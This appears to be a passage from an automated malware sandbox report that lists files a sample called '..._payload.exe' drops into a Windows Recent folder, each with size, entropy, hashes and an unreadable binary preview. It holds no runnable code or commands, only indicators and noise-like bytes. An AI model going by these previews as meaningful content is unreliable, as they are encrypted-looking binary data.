                                                                                                                          SHA1:6A817CCDA64143761E7C2F38DE6C09767DDE57B8
                                                                                                                          SHA-256:B4D3643AE66D2215B4567D4A6C188E3EB54D70D822EAAD8D1B14D6ED4C5F8EF7
                                                                                                                          SHA-512:26AEC2FA62AAB3FEB1312BECFCB6823150A8300F67307662310150544590E23915EA61C5C3EDF5F4CC7371AFCC3C90D01F71097EC3F00C5D5BAD9BD0535A8AC0
                                                                                                                          Malicious:false
                                                                                                                          Preview:AZTRJ/Q.bMVu.~o..L.._.*C.J..j.a...`.1Ra......$I.....s.zB..W:....e.M..Y`<i......l.F9....Z.UK/..U3...c .i.Z.T.>..r.S...`..qr7...j..#.....;P:..N.S..=..).b..3....|9.#.W.Q.-........WT.e.+.}....}$..3;2...U.U+..)....~.....%...Q...0.A.m.n:t..X..uZs.g^..NP,....L....v....a.j......v0+@p......Z<...!...7?..W.....0'.l.c......Ax..b......:.~......8%.RI.ra...'A."..=.{OGR....<...<..<h.yp......7b..6.o..o......n..|'.s.4..9...#'^|.C.].y.Qt`N..q$9;Tw.7$..m.:.-..4..Px..\.`..w'^..Gx.Vk....C.3..~..y.\4..s*.........Ic.fX.....|....a.[.>.Pl.\...Q.....R.... .PL.A..T-....W5..ur....>E.Q..M.CR'.j...u)E.^..$.g.k].....<i......uzT%.,.....$...H..t}..'u?\ITn.....\J.H&H R......J{.h..z.s..+../+.K..l~...?../i.g.h....a.;..a.;.u.q.}!...E.}.`J.DWbC.U.......\.H.`.^X.W..|.L..v.y.D...d.'{O......Y.~..6.....7U.9...Q].u....2....bp..Z._.......T...Ehp..../......hJ.%.l..j...b.pE..>..P.j?p.whmu..Gj5`.}..r.,........d..;.-...Xt.oZ.$=.H.......:.ad.Jb.....w+.........EC..D9.rI.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BPMLNOBVSB.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836359186745318
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WOvC3/qxwaLsVOOfG1Asy3bo2rjVNWL2Yc+3b1TEbW3gYd40nKmFEbD:WQC33aLsVxsy3s2rT+xTE/AnnZOD
                                                                                                                          MD5:120594615C1859E021176AEA44714905
                                                                                                                          SHA1:2F4B4E24F5D8C8468877094AB142858CEA670B32
                                                                                                                          SHA-256:730AA47BC67367DB82AFB77C1B6F1CC0F2630E6A755948239D80378588DCEC2F
                                                                                                                          SHA-512:2DB974A762943E16A91CC47AA9A08A8E2E56B1E763B95D4580C1868F2304EB8476B55B78E81F39ACDA79F39AA32FF1744195032E98C7BA213EE44A535138BBE0
                                                                                                                          Malicious:false
                                                                                                                          Preview:BPMLN\..[}...l$......l.H.D.~.sH.^..~`Fz.:....~,..R...s6W*..SiJ....7..:...9..a.CeJ...a...,.g..A.P..#A..u.x...Y.......T+..=..Ofz...RY9...}7.P!c.....sA..M.9Bt.pVB...}.`.F8b..%...`..p.~%P$....Y(.X:.P.."'03.u..O_.x...k.x.3.......M....4..b.p.,..G...x N..Z.^.e..pr...z.WZ.`G..P.. ........$.V..F...qy.".V..s2..^.....k..p..N...rf',.W"^.....=.h.QB.._1...A.Oz.L.XF..........s..."..]...(C.....BC.O.8v./..5....9%.r.0M...n...No....NJ.]..#;..]......:D.I.z ..^.....~T....f..l..]..0..wU..S.(?.PR=..j.R...Q.(...{0...-oh.V...E..GA[..f...l..]......s.....s..-,.r.5*.w~.d.=~.`eL...KhL.q....eH5xy...(p..s....Mv...I..U.......%..)Y.s..+../7..;....=..$Yt ......@%._...q....L.{.j..fqjI...s.H..?.~sR.QN!........K..T.Vm.*H<`.O...._..A+P...=%..=l..v....<........Z.@B.....D.&.r5\.<. .%w} ....a^h..4.n..#.kZ.......fs....sk.{.5G..TD..f:..J&&...E..-.D..b........>..U...l.T8...=.V...G...~.............[.V.v..q..n~s.N.~...";.<.P..'].V....EWi.!B-..LTYs..{..kq..\..=sC.].)!...g..`...u.;.m....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CULUOHOPZT.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8728151694692965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:79C/UUsQVB7tNcpujcy2+i+ctu6OZFuBcRH2mmtIH1Kh8uQTz7MNZJpJY3kbD:MhVB7Dcpmcy2jtHOiBcRH7VCU7W/J1D
                                                                                                                          MD5:EF35156985121799DEDD08EAA03C1D48
                                                                                                                          SHA1:960239B6AD6FF51C1579050D4FAC05333C9C8553
                                                                                                                          SHA-256:BEC406791D764897F107A8325D107D355426C0D2154C6F98E6A0A9FAEF72F3D5
                                                                                                                          SHA-512:30304796BB16D240D840D058AD6CFB1350D89D0E00B334BC0003BED62B93EA224CAD8216DCDCAC4CEA3583201C7CA3F6CCAB2E2606EEDC3D46B1BBC8F4EEA3A9
                                                                                                                          Malicious:false
                                                                                                                          Preview:CULUO.|.#.=[Ik....9....f...q2...a2q..V.......x./.......].M...P..I>..r.u..4........@...UW*...u..bpI.^Vde..*r...e{..... .*..zp...RhC3Wp.....>.[8...r..U....&.#O......H........*....}.N.........aDs...Qsk..Z.d%4U(.g....V.."/.W.j.).....X..[...#.f....%.b......M.L..~N....YEI.C..,..@.[;.#...k.M......{.@..#;..a]...F..Y..]..7...3..G...Z.kh.f7.\....Q.*....<...i.I..[Qg.L..!..s r.6U..U.QQ4.j]:Hg..?{.*..~....}...^a.f..'..a..C......<..(.....aV\.Us.F>...WC..m....E.....F,...M...cn.pI...-z..qSO#D.K.;.mq2.......|A.Y<w..$...-1........i_.R$Mh..^.N.qNR.....?P.vtZ\`.H.....lqA.I....TK.a.aR...W-1M.c......YX.9..O3F..=.|Y..OYi.Rn.q<......KB.LZB.`..e.|9k._.w.6..M._...Q/'..?........(X.M..{FY.R8._s.%H...K.;..t..$.w..N...C.,^p..6!L #..`..'.......7...}....YLd.-VO..u>..].a.....v...G.......qn8.-D...E8.XC...;...y1...S.-..m.........T...[..Q2.7~.0.m'f..;..t..Y\&f....7.z/o4bm.....<....t2_?:i.<......w.u.}Cl.H.._..p...)......=.-..f.K.Q?.jXK)..PM.2..<$/@>..m...... ...=.K.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DQOFHVHTMG.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849833705210816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jMq+a4bXa7oukHlIFhTEQCJ8CmfQ3aDhsRTSQ2oUjkpg7vhMZjQrfdB55urNYpo:9qQWbe8h4QA8CPqDhsNSl+Z2FBPsNYuD
                                                                                                                          MD5:43091676F889F086966EE74E5A06D891
                                                                                                                          SHA1:B1C500EFBEBD5EB384B771E8997104B2BD5A76C0
                                                                                                                          SHA-256:00A5E9035455F62D2B290525F8E7CC32FF6489AC09DD8E2AE904F69488CA5462
                                                                                                                          SHA-512:567429F5BFA389920B82CD19215E081357FE165B552C9820CC889231D3ACB82BA834C70E3B69E2E107EBEED393E2C08D20CD06F11E09B809463ACB701BAAC185
                                                                                                                          Malicious:false
                                                                                                                          Preview:DQOFH.v._..uq..dv..C.Y.D..Z....U..a.....-.....Ih g'..9{..`..c......Ud..c.....}.......L..[.H..^...6....L.-..S...D.*...............T...y.).e......[f..,(..}.E..&tD`.X\S.J...U,Iu#..|..2pL.|.>($...1..s....=......k3....`...p.:W..{t...o.=5......Q...a@.+..C*.<.%.......$.T_o...b..x.v.....*.Y..*d.n.L.........c)..)...>4...Y]........(...D.);.4.e.@.x.OhE..B.G..$X.>.]..6@."..!..i.Y.....1...e.X\...<.../.5V...}...H...@v4!.1.Tc..L..#[.H..,.}.C4...oG.6.+=.."V..8..j...1.[.M.....-.<...l....=c........6 .Iz........5..7.L.V3Q}.q<ch....._6.l;.+....Y..W....a*~r..i..@.....;..!.t.lH..._8.zZ-A7...*...t....g.....@.00E.+5'+.v...|i....V.4K.).&.....C.E.k..O......`')....>.D..=../2$...,`.\..1..7.0D.}t2|..E..C._u..L..t..>.<{oJ.{Q>]...V....._..If..of..Z....FYZ..c$....m.,.%.......{..{+?.o..%6=..>.5..#!v..By.w....Y..w.7..;=...x...DY$..K2JM..+.f..yVX....J_.>...%..4..Kx.'..W+......P..#..=.g....u.<..Z.|..RX..{.>.....L...q.J..L_h.....ov........!.\..82.pp../..`G.....dWI..I.<.y.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DQOFHVHTMG.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.844653661567389
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:A/XZoxhc+pqY/dJRbs3TgYwPhIy7KCson+AR7CyRN52yIHHHXrkK2Ovrsbrgw+mQ:yihccqY/zRbi8Ywpb7Nn+ARWyRN50n3N
                                                                                                                          MD5:428A6093CF473E11469DB81298CEEA22
                                                                                                                          SHA1:5DB735B6E27FE676C4EDC41DE983A15AE71B0689
                                                                                                                          SHA-256:8C29677ABFCBA1800FD5B0300687799C2F2135198B005DCAE84AE9E2BB7D8C04
                                                                                                                          SHA-512:F7E101E8C77BD21A0B937BFD72177BBBD8D0EA4C0B62BFC3475227BDA97258BF4CACCED2B9EBBD84DB013B818136EF1C236B39E5AC11BDFABB9454862AD94A32
                                                                                                                          Malicious:false
                                                                                                                          Preview:DQOFH..J.c'..C...oG..+.....>..xFuEj.Q(.b.w.......IF.S..tK.L....9.<....].m.Hu...8..8..d.q..B.U.e..g....c.....=..rg.6...`$..~.W./.....<..=......^.c.'......o.a ..`.....I....K`qd....hY.._.l..a.F5^..$x....i.i.l.e%..j..|e..KR.<x.N..q.|.iBb@R.<..W...v~.ow....t.}66Wi..H(o.p.HljiVmk...O.x.i....../.......W...Xq.[.)B..L..W..]c.R..,.[..k......Q%.....t.....)t.....<......U....1.'.'.;ltb..&.C.s..D...'*.1..."..RT.f.]..`.GTx..i{..i.%k.C..A8o; +.2...I?.../H..X..W.|......[^.R.D....w..n... U.&n.5......E..R.....u...Z&...&h)l..kM}..|Mr.t.Y.uw*..y@~#.t.A.vw...pT.pX..b2.n..^...&.@IU.d.W.v]...;cV.....%...v".....,-j.f._>/:...>.;.Rq.OI>.}..k...7.<...I.z~...C.1l '..6|{...`....f..L.v.t.c).i..W..f.au.....b.IO...Ka.,.e.7x....MF.......vG#.Xq......~.... RN....x..0TEM.....o..&&#..~...19.@...k.P...k......t.3..3..R.../.u..9{=+.SX.W...p.^.}.....lh.D..''..=.....=.Y.....g.f.y.....E.....:L...@...=.p....?<IU&.....u........Q.7.......G..~...IP.....u..H.K#...-?..&Q.....*R7.:x+.i.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUUDTUBZFW.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.836771979682248
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4yvWh7t0Mb2oHdzEVcuQ91zjKJlsoYmAX6egUquC5I4EHcDs7T4xaHywiNmnmbD:7A6MV9zOcu6zeJlsoYjX6NuCdDYT4xg6
                                                                                                                          MD5:E957B4E4FA1441FE0270F1AE988863AB
                                                                                                                          SHA1:5EB325B15D789E2612F1C13DF733C6582F290842
                                                                                                                          SHA-256:22B58795D3BF1D76DEBA9D6896C664659519601CCF1D571C7E94871110BFA311
                                                                                                                          SHA-512:DBFB18D22AE00144BFEC8B493F31B5F83612A440288A72818F13D00B2A4101B6C28DC105006F7933D34C87E1832F1CA8223B9CFF7A4A5B39EE3ECF884DFD5418
                                                                                                                          Malicious:false
                                                                                                                          Preview:DUUDTO.C....w.K...t.e..[g..|.|....-..gI..*.g/U....{......g*(........M...#.hCdA.j.5-vu.b.5.q.t......R.o..b.W}...T8.....O..c.o.3......t..fw..../.TY....w.oS...|..x.B..A...X.Up*..o.)....=...c....E....A.S....$.*`.K.#+N.<V,..=.^.(.Q....N..l8....3...).Y..L.....#f,j%......tP...y"....'-.i..&..}D...,.`t.h"..C.4....O..a.....B.Sh5.N....#e.|dAK.NT.P...s...r.b...?.EN.;K,O2n:K=..M...}.u.5+...a5M..W..,..1{.iX.{.e.U.-/C..i.7....Il....jtsgi.JL...._....C.&..r.!. ..G~.4..bQo...#....z.(.i......).{..+Ugf{....;*.:...SjC\6......n._O...&..[.-.o<ew...K....ai1...-..>..!...{3................l.~+.q..f,...=..;%...7....&...N...].s.DV.O...5..;.mD.<..%nE.d`...<......H..d.}..h....G...\../..=..?]....H.2.W3Z....R=.............+...\.b\..?|.4.....l.7R..=...eR..4..e..../.-pA..]._zfD..*.SD.........F.1.D1.yU.....'.`...\uIF...*...40....;.....]..j-.Pc................Qp.E=9....N.Q....."&u]]...~{.M.TD+..(@.Y..}.R50g......z.@b1.!.IEA.d*...........s...l...|0h..tma........$.Vw.Q....I

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ERWQDBYZVW.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.861002719007977
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tHJENkLG9BvJFL74XhGvgv2GUg0xti9KLHLBWUTXCLCm7xDMqGcMcmiUx4O0oW6u:0OGDJFoRGvCh2gKD0QCLV71yiHO+7D
                                                                                                                          MD5:855529AEACDBDC586FD3972A8670B88C
                                                                                                                          SHA1:D09DB0F12942C243B55F835CC0510A2051850D5B
                                                                                                                          SHA-256:7D2195F97CEE4B17A5167029F8CF12B83F4F43FCFC7C16C3FCE8032EDD6E08BF
                                                                                                                          SHA-512:D5E9344817B7A22A62C1F07D3C9CC118CB86F8A2F8F1918023C34A1A8E84808A6860D45C112397E0B66308EC8919E4DC7BDEC57648625C6BF424C88EEE83501C
                                                                                                                          Malicious:false
                                                                                                                          Preview:ERWQD...r..Ot#,...}.f.......\h2......|......8U.<E...R......?..A.....4.......M.......y.,..Jl..>P...U/[..(..3V.BNN.8.]ZP...$-*.&.._....h..^.D.@;R..;G.......!..r.....;VZ..3./u.XulS..A..Y.>u#>.....).Q<.fE.$...S..C....?3Y...m...0-;.)).Z.$...(~...B&s.1u!E..*".:..-7...=.%Yz..b.B.`a\7{.......".Q.9.;..q.....@v.r...Z....R...l..ic.c.$....$.D...~....v..L=3.].....w%<...A.....B.cq.,.J....V$fn..b..%c+t...l.dx#..=.k.....t.F..rA... v..y.ks....&P?.s_R.d....[s1..%K..k....0.Yw.d!.C.C...._.^p...._...G...k..r..%%.S.._.y.+..,\.Q..s[..g..9^...n`v.j./.'...K,W...J..?.I#S.y...?.o.....G....W:g..P..s.{.\..MN......L.lJ.o]<J.....[De.....A ...d<V.I..x.+q../...2.+..]"....J.....Z..u.G.\..lp.@.U...+.........6%...bO...f.'P..}.O_f......RN1odWA.."^8.;../.T.......^&1asu%@'J..3.}.....ZS..|d.$.#pt....h..).7..".Ar/'t....(.a.Y.?...k.m.9r.".2.<..^..9v.~..$.|3....D...&$.E.AW.E..b*.&6...m`.3.......hJ.....C...Ru?Z...&ED^K.N.....>..Y.........Y...biH-\1.!Z...C.. ..p....E

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FAAGWHBVUU.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.827825184580777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tQW9f3BH6eAr7gpLr0ceaF9jEaGPBGmTDKBpxQaZ+bbAOZRuXt9Su6L4bD:XN6eKgxrkaF+kmn4ZZ/OZshuiD
                                                                                                                          MD5:425DFEE3F2CED2679796660D9E328D18
                                                                                                                          SHA1:63F202E30F0925406871C36CCCD1DD496CA7CA74
                                                                                                                          SHA-256:E0DD57D4C210F4388120FD04E690B110ED129B1F7E6A383497B57D0CE80B2D33
                                                                                                                          SHA-512:34D199310FAAB5BA39BEC78CB1EE7AC0334D2B39112F0F64A86C9C16C17148EC03C02479C9753AAD7664E26637381DD5504907DC793F42114F8F8212B0F3592E
                                                                                                                          Malicious:false
                                                                                                                          Preview:FAAGW..Z...z.....]..=2X^....)h....A.b..TK_.c.v:vX."z..X.....Mq3K+e..{..(....a.D...|.J....a..0..R..G.R*.L........i..<k.U..x7.g..)6....w.`.....}..2,UsB..T:..t?.<.K.}...75J..n....Y..\i..gf....vM|..%H?.`T......|.{..(..I..x...s{j/y+2q.v%..z...kXU.B..A<.7.I.5.....|...q..<....C..>&.../=.T...J...R*.Y...ZK{L....../......,.....m._.&...[..s...nU...D.......g,..rC.6....|..........+)_.........;...y0e..;'lW.8QZ~.t.Q_(.'.'f.%..5..\y...b.~.a...d.|..73.Am..k.c.I..w....@.i.k.LE..p...~~...$.Y.Z................L.&.}..0..b... l...g.W...NB....;o..Sm8.+.S..b...c|..q..o.0.6..Jlz.Ar..i...Q6....+......rJiv.m\..}.[...j....Mu.P:.*........eb...F..>.....@..G.........+.-.;.%j...c.....K.....uT&kH~.~.:?.;W.AVcT.,..,6~D......Ws.....v,-.1N.u..9.Ed.._.j.(.fO.mF..'.Y:.....R\A.2..n.m.-..f."....r=..`tE.G)...|.u.5..5|C7).l..._...ImH.t!...Z...\am[....VFR...W..T%.w.4.o.|j.Sb.@......m....^.U........F.F.ia..3.....o2w7."4.x..5.r..Y|.....93.VR..L...zk.5GZ...G.,b..7F}@9..q...V..P

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.833819479216409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:v+cD8hjcE3xdsSnk/3df4QuE8uTlH7LpCP9HTWm8JA4/cPbD:vnDDE3bTk/3v9x3pmNye4/iD
                                                                                                                          MD5:6EDC802FF80E3281321DFE88766D53DF
                                                                                                                          SHA1:E274C4F73B43F40E66DD02584243F2EBB0B58E11
                                                                                                                          SHA-256:F28F1E1465AC0A174DF7863BC70CD15BDAD898A8471F4E16D168F0D843946EAB
                                                                                                                          SHA-512:ED17B52CFB167D8F09DB13C3A95A490F29B1EECE7E4B41F06BF37CF109D8887668C620550A9C5240C45BAE6C5C2FDC5BF46B1F93F264DEFF0C266772FAB09FC4
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV\.5."..&=5..j.cp.B..-w3..q..F.........{5.|...V....Q{D..me_.)J......b.%`+.....+..../4....p.....Y.../m3......A..R.Ff.....H.:M:.{,.)f.=>(;5.].\e#4.x....7..5N.5.R..YCp..7.g.....R:.z.t....a..d.hA...e..(Sq.....ONX~..+..jO.{......^..r..-F..C.L.2..:..?zjE.8...>.=O....p....z.......V.mphE...E.5..../..6..x..%....(..{.5..8.R..$.}^u.k"1..2...B.R.. .Qk&......s.........S.?X..o..Vd.q3q|r....f(x.N(.lA~!..A........:.f...:N].>....p3.._).....8.IXr.~...L...~.Pq..:#..]..C...Q&.tX.A.Jcm....=.'nI..G...?L.\.|.....Ei..@......$0./....v..M....s.......*..z.).M...7..Ph6....q.{b.h..g.x.9.........+.\I.%,..w.~..SF`.rcQ._P._G.xt^.65*s.U...N_..}....0.{.B..9.}.*>....Z..'O.,.(s..l....U.^.....V.s..&.)Z.....*....Ulq..uy..:.\.9t6..dZ..Ns.R^..(.b.....V.z,h.Q/..L....9P.L5T./x..$....p.R.Dq.....M.8..?c.A;].$sG:..bY.....}....{/..u.;.K...8g7|gE.{/a.=*.t..U.F....d.`..s.f..y.*.3H6..B'...wE.....]..T..... .0cGcX...`.............Y...-...LX.....P....Y@.j....A=.y...'..uNx...]n.........y..ar.d.C.<....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8332912263665175
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:A4iZ37Rt8m1NT18AED3X5QJ80D3Y4+q7HmUHTchpgsLj3brbD:ZI3VpN5+jc+wHfHTGbD
                                                                                                                          MD5:670B46BCB2FA4E57CB973926192DFB74
                                                                                                                          SHA1:6951D2F7E46F5C7AF362995EC0C517AA49BE6753
                                                                                                                          SHA-256:7E904E981A62430251AEE7271D7C6CB1780D841D4DA3B1B24D758A7531E4F56B
                                                                                                                          SHA-512:60E1DE97D0875A0061D75BFA62DB34C12237560BB2BBD35A172CB7015AB3036BB9407B21CDE7F2E034D99F187ADE625249E1F6717F549607D916D81E61F3D1A4
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV5.Vd'..f!..+..!..fu.J.3...;[......O..S.Ye.o~j$..c...1"/.w5....2..A......?.a.....H...i.2A...T"....;:.y....+..e..!.>].1..+2\....Dc.K..;.?.g.-3.... 4....jE.M.X....l....."....r.L......`.1U0./.E0.O.6...-C....K..vV.WI.H/......0..*..z.......j>.._N..8.U...I.L8..hXn+.|...wT.W>...6..t....Ng.R...'.?..[..~.0.4z.Fq._.....?..CiB9.....c..~E....h...#..mC..Vh.E.z<...Md.V....f.J.....~XB................_....6.c.x4{....r.w+....1.[.Ka....R.E{.._...A.~.O...8..TEX..SY%$....a..lZ..[.Zp]..w4g?....4)&]...:.. .#...f_...kG.Nbs.m.7@..._..&-'Fz.D+.+8+5...V.v.Be.H.\.9=0Iss.<p....B.3.e....I.r..p.41.cL..'...G.z.{......>..]....].-...%....{-~..g.i/g..J....w..-.4L.....V..j.;..1.P.O.... .....(.v..1...9'.*...z.NB....".(J.6..............q..$.9........F.....3...'.3.(..w.Y.m...j.t....2tiy.o.....'.n..Zp.X(..L.<....nr...AD&C......HG.+.<[.r.....:.l.S.....t..!G......g:......:.D[~...R.UB....IY..0......g8.4...ON.J>e\...I4R{w.;:....Qc...)"....>.ZX.`.c.E....#!..k.g.~a.....R....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863219859972402
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pb00vZjPvWYSiPs7ud1xdJR9Ge70ZswMjcN2ixDwOjYJPbD:y0vZjvSiP0ODdJ7z0ZsREnKOiD
                                                                                                                          MD5:73F00CDAB22EC20962CE035A69F8421D
                                                                                                                          SHA1:6101E2A5D45CE0BA53A473C932DD9D758F96C64C
                                                                                                                          SHA-256:120AE2A30162C64BBD2C61E1CFE85EECDFD651358502F6C5ABCA62A57092AAE6
                                                                                                                          SHA-512:5E1B5FA80EC58ECDE95A7E6A961BC7C10A2C48AEBFB3B704F2E916671FC2A490726B599D8059121F779A6A00837F0C883EDCF20B6377ED0836F9B04897D81DFD
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV.....L../....<J.......?......P.Z....h{R.b.@.<4]..%.H...AO,......p....\...*sJ.p.>!CH..b.. x.V7..7...w.D.i.F.[....<g ..W......]T/rjH&...~..$.....0j..........S................\...].:)........NW.N.....cK...)S.\BB......=5....g.,b.......1.ip.9.3.0K.s"-.T.....F.$.0.^...5/1.....G.Rkn+....:%!.f*S....:}M...A....1......N...T..!.dD;...x9E.....%wS.M..l............c.....P.x....NT!5r....K...M..% .^.Wb.:nF.=.<..(.s.?..}T..A.y..M.e.o.5T..Mo...[.m..vx.4..}...w....J..7#0..?6 .Xl..&^1...-.gS..z.3%..r.rZ.....#3.^C.#...r..%_.......ty.b.'G!......QAh..S<CO...F..v.........^`*...U.Yl...d..`..a....(c.q.W&\II..P.....jA..........J...".}.i|...!AG....v.F..|.,.J..(..].kv.....dT"...X|[a...KME.......G.%4.K..(D...S#.t.."T..fa.J|..|....+...z....[...>K."....p..Z-..`o.W...."x.w..z.%=T.W.......g.$4.r...6>.5..?.....G.z.T...,.......D...../c.*.G...1v....B,.w..pF..i..'..&......z...@<QkW....:.*=...Y8.zH3XP...%/.vVj~}!!..l....S.}I.K.l..:.novv8k`~<`..#..D..Y=e...N.p...T!z.. ..".

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839997606643772
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2sL3x6L7NOOG4tkWZt9VQ4SaqSDPNZKyX5lHyW0C+geDJI405JlbXg1UbD:283x6Lc6hVSarLNZKkn5eVIr5JlbX++D
                                                                                                                          MD5:5D755A9DF650F78D2BE3711424F5D22F
                                                                                                                          SHA1:CC10B16303B3793B7AC38BFE13F04295EE645514
                                                                                                                          SHA-256:E2E17D07C59279961C0B570661DD3D28FACA107DB2FD9E0E5F3A1C5964EA7F31
                                                                                                                          SHA-512:431BB1F81D4D5193F65D16B47C4E401B2A4749AE103C30B99C3D4070E1B40689FBADF7B9A942FE944982D4FB7E66AD56BB44889687C2836837D708E3E89255E4
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV!v.E-0.)...D.~....RDHB..$.zmE.B..)3........X..v.......3.x...A.X$...&....v...$.....F.......S..{....=UY...x.....X....v..:.n1.j....'..i.>u?b...^.nPc.tP...B....$.P.:.......i..m.|.E..t...#.t!6.n.-.e.[.=...E.SV$l...;2\).....I..*.'.I....g.E2.P. ....f$6...t...^..W....v.[.....G..:.}~.*.-.i.l.8.Y"...........G.F0.P...M....x...N.&A.....h.?..d.h.....[....#!1..U...T....7.....0Ia.h..&H../#..#./.*..7QG..<A.(.....z$....q. .!...U-h.+....s.8.96..XT.rA.{+....@#.`............3..v...B8G..w..m...V{.Bk.....+......c..LI.|.....zo>....;]1............X..s.......V~..k..X.......{}.A..2.X[#.&..S...'.k[V..`[>J..}.I.bH.tl.F.QX..&2......="..lT......f.t..m5B9.#.?...E.e...m..<...q.6P.,..5z.=!.|2..T'.......W=g,......%.o./..j`.Y0.^.Xu..ME.w.....IA...x..yn......?.....a*...q...M..=.M.n.80..UV.D=i..z..E....A'.9.........~..,fd.......)...8;..yjqt.h\]1...`.m....n;].p.dro..m.>g.yf.W.+.r<..y....g......[.f.';df..B2{..$.)...w/..;.a...._p....z5..E.@..|`1.........<..d..n..;j..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.847414800438862
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:RKurG2puQfSYNZNEXYuzl0j6E1+/fVrCxFvKQ3YL28JC9t/EqCe2ClSQErAYOCbD:EIjqY3NEXoj6E1+FruvKQ3Ya8+ZEE2ym
                                                                                                                          MD5:C81D429256795F88A12D220E27CCACA5
                                                                                                                          SHA1:3923970DEDB97E03C741A6F166653DD8A71C6AF2
                                                                                                                          SHA-256:D3CAE8689F041B697B753D088E2398626DE021DFD7DC97D93FDE481B777975FC
